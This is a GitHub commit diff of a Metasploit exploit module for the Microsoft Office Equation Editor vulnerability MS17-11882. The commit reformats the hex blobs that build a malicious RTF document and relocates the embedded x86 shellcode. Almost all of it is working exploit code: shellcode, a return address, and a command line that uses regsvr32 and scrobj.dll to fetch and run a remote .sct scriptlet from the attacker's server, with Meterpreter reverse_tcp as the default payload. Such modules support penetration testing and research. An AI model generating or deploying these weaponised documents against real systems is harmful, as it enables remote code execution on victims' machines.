Skip to content

Commit cb7f173

Browse files
author
Austin
authored
Update office_ms17_11882.rb
1 parent 960893b commit cb7f173

File tree

1 file changed

+103
-57
lines changed

1 file changed

+103
-57
lines changed

modules/exploits/windows/fileformat/office_ms17_11882.rb

Lines changed: 103 additions & 57 deletions
Original file line numberDiff line numberDiff line change
@@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Remote
99
include Msf::Exploit::Remote::HttpServer
1010
include Msf::Exploit::Powershell
1111
include Msf::Exploit::EXE
12+
include Msf::Exploit::FILEFORMAT
1213

1314

1415
def initialize(info = {})
@@ -38,6 +39,7 @@ def initialize(info = {})
3839
'Payload' => {
3940
'DisableNops' => true
4041
},
42+
'Stance' => Msf::Exploit::Stance::Aggressive,
4143
'DefaultOptions' => {
4244
'EXITFUNC' => 'thread',
4345
'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
@@ -55,54 +57,107 @@ def generate_rtf
5557
header = '{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}' + "\n"
5658
header << '{\*\generator Riched20 6.3.9600}\viewkind4\uc1' + "\n"
5759
header << '\pard\sa200\sl276\slmult1\f0\fs22\lang9{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata '
58-
header << '01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff'
59-
header << '0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffff'
60-
header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
61-
header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
62-
header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
63-
header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
64-
header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
65-
header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
66-
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff'
67-
header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
68-
header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
69-
header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
70-
header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
71-
header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
72-
header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
73-
header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
74-
header << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e007400720079000000000000000000000000000000000000000000000000000000'
75-
header << '00000000000000000000000000000000000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000000000000000008020ce'
76-
header << 'a5613cd30103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000'
77-
header << '000000000000000000000000000000000a000201ffffffffffffffffffffffff000000000000000000000000000000000000000000000000000000000000000000'
78-
header << '000000000000001400000000000000010043006f006d0070004f0062006a0000000000000000000000000000000000000000000000000000000000000000000000'
79-
header << '0000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000000000000000000000'
80-
header << '0001000000660000000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000'
81-
header << '00000000000000000000000012000201ffffffff04000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000003'
82-
header << '0000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff'
83-
header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
84-
header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
85-
header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
86-
header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
87-
header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
88-
header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
89-
header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
90-
header << 'ffffff0100000208000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
91-
header << '00000100feff030a0000ffffffff02ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e30000c00000044532045'
92-
header << '71756174696f6e000b0000004571756174696f6e2e3300f439b2710000000000000000000000000000000000000000000000000000000000000000000000000000'
93-
header << "00000300040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\n"
60+
header << '01050000020000000b0000004571756174696f6e2e33000000000000000000000'
61+
header << 'c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff'
62+
header << '09000600000000000000000000000100000001000000000000000010000002000'
63+
header << '00001000000feffffff0000000000000000ffffffffffffffffffffffffffffff'
64+
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
65+
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
66+
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
67+
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
68+
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
69+
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
70+
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
71+
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
72+
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
73+
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
74+
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
75+
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
76+
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff040'
77+
header << '00000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff'
78+
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
79+
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
80+
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
81+
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
82+
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
83+
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
84+
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
85+
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
86+
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
87+
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
88+
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
89+
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
90+
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
91+
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
92+
header << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0'
93+
header << '07400720079000000000000000000000000000000000000000000000000000000'
94+
header << '00000000000000000000000000000000000016000500ffffffffffffffff02000'
95+
header << '00002ce020000000000c0000000000000460000000000000000000000008020ce'
96+
header << 'a5613cd30103000000000200000000000001004f006c006500000000000000000'
97+
header << '00000000000000000000000000000000000000000000000000000000000000000'
98+
header << '000000000000000000000000000000000a000201ffffffffffffffffffffffff0'
99+
header << '00000000000000000000000000000000000000000000000000000000000000000'
100+
header << '000000000000001400000000000000010043006f006d0070004f0062006a00000'
101+
header << '00000000000000000000000000000000000000000000000000000000000000000'
102+
header << '0000000000000000000000000000120002010100000003000000ffffffff00000'
103+
header << '00000000000000000000000000000000000000000000000000000000000000000'
104+
header << '0001000000660000000000000003004f0062006a0049006e0066006f000000000'
105+
header << '00000000000000000000000000000000000000000000000000000000000000000'
106+
header << '00000000000000000000000012000201ffffffff04000000ffffffff000000000'
107+
header << '00000000000000000000000000000000000000000000000000000000000000003'
108+
header << '0000000600000000000000feffffff02000000fefffffffeffffff05000000060'
109+
header << '0000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff'
110+
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
111+
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
112+
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
113+
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
114+
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
115+
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
116+
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
117+
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
118+
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
119+
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
120+
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
121+
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
122+
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
123+
header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
124+
header << 'ffffff01000002080000000000000000000000000000000000000000000000000'
125+
header << '00000000000000000000000000000000000000000000000000000000000000000'
126+
header << '00000100feff030a0000ffffffff02ce020000000000c00000000000004617000'
127+
header << '0004d6963726f736f6674204571756174696f6e20332e30000c00000044532045'
128+
header << '71756174696f6e000b0000004571756174696f6e2e3300f439b27100000000000'
129+
header << '00000000000000000000000000000000000000000000000000000000000000000'
130+
header << "00000300040000000000000000000000000000000000000000000000000000000"
131+
header << "000000000000000000000000000000000000000000000000000000000000000\n"
132+
133+
134+
shellcode = "\x1c\x00\x00\x00\x02\x00\x9e\xc4\xa9\x00\x00\x00\x00\x00\x00\x00"
135+
shellcode << "\xc8\xa7\\\x00\xc4\xee[\x00\x00\x00\x00\x00\x03\x01\x01\x03\n\n\x01\x08ZZ"
136+
shellcode << "\xB8\x44\xEB\x71\x12\xBA\x78\x56\x34\x12\x31\xD0\x8B\x08\x8B\x09\x8B\x09"
137+
shellcode << "\x66\x83\xC1\x3C\x31\xDB\x53\x51\xBE\x64\x3E\x72\x12\x31\xD6\xFF\x16\x53"
138+
shellcode << "\x66\x83\xEE\x4C\xFF\x10\x90\x90"
94139

95140
footer = '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
96-
footer << '4500710075006100740069006F006E0020004E00610074006900760065000000000000000000000000000000000000000000000000000000000000'
97-
footer << '000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000400'
98-
footer << '0000C50000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
99-
footer << '00000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000'
100-
footer << '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
101-
footer << '0000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000'
102-
footer << '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
103-
footer << '000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000'
104-
footer << '0000000000000000000000000000000000000000000000000000000000000000000000000000000001050000050000000D0000004D45544146494C'
105-
footer << '4550494354003421000035FEFFFF9201000008003421CB010000010009000003C500000002001C0000000000050000000902000000000500000002'
141+
footer << '4500710075006100740069006F006E0020004E006100740069007600650000000'
142+
footer << '00000000000000000000000000000000000000000000000000000'
143+
footer << '000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000'
144+
footer << '00000000000000000000000000000000000000000000000000000000000000400'
145+
footer << '0000C5000000000000000000000000000000000000000000000000'
146+
footer << '0000000000000000000000000000000000000000000000000000000000000000'
147+
footer << '00000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00'
148+
footer << '000000000000000000000000000000000000000000000000000000'
149+
footer << '0000000000000000000000000000000000000000000000000000000000000000'
150+
footer << '000000000000000000000000000000000000000000000000000000'
151+
footer << '0000000000000000000000000000000000000000000000000000000000FFFFFF'
152+
footer << 'FFFFFFFFFFFFFFFFFF000000000000000000000000000000000000'
153+
footer << '00000000000000000000000000000000000000000000000000000000000000000'
154+
footer << '00000000000000000000000000000000000000000000000000000'
155+
footer << '00000000000000000000000000000000000000000000000000000000000000000'
156+
footer << '0000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000'
157+
footer << '00000000000000000000000000000000000000000000000000000000000000000'
158+
footer << '00000000000000001050000050000000D0000004D45544146494C'
159+
footer << '4550494354003421000035FEFFFF9201000008003421CB010000010009000003C'
160+
footer << '500000002001C0000000000050000000902000000000500000002'
106161
footer << '0101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A001201E1200000026060F001A00FFFFFFFF'
107162
footer << '000010000000C0FFFFFFC6FFFFFFE01D0000660100000B00000026060F000C004D61746854797065000020001C000000FB0280FE00000000000090'
108163
footer << '01000000000402001054696D6573204E657720526F6D616E00FEFFFFFF6B2C0A0700000A0000000000040000002D0100000C000000320A60019016'
@@ -123,23 +178,14 @@ def generate_rtf
123178
footer << "}}}\n"
124179
footer << '\par}' + "\n"
125180

126-
shellcode = "\x1c\x00\x00\x00\x02\x00\x9e\xc4\xa9\x00\x00\x00\x00\x00\x00\x00\xc8\xa7\\\x00\xc4\xee[\x00\x00\x00\x00\x00\x03\x01\x01\x03\n\n\x01\x08ZZ"
127-
shellcode << "\xB8\x44\xEB\x71\x12\xBA\x78\x56\x34\x12\x31\xD0\x8B\x08\x8B\x09\x8B\x09\x66\x83\xC1\x3C\x31\xDB\x53\x51\xBE\x64\x3E\x72\x12\x31\xD6\xFF\x16\x53\x66\x83\xEE\x4C\xFF\x10"
128-
shellcode << "\x90\x90"
129181

130182
payload = shellcode
131183
payload += [0x00402114].pack("V")
132184
payload += "\x00" * 2
133185
payload += "regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll"
134186
payload = (payload + ("\x00" * (197 - payload.length))).unpack('H*').first
135187
payload = header + payload + footer
136-
137-
path = ::File.join(Msf::Config.local_directory, datastore['FILENAME'])
138-
::File.open(path, 'wb') do |fd|
139-
fd.write(payload)
140-
fd.close
141-
end
142-
print_good("Wrote payload to #{path}")
188+
payload
143189
end
144190

145191

@@ -207,6 +253,6 @@ def gen_sct_file(command)
207253

208254

209255
def primer
210-
generate_rtf
256+
file_create(generate_rtf)
211257
end
212258
end

0 commit comments

Comments
 (0)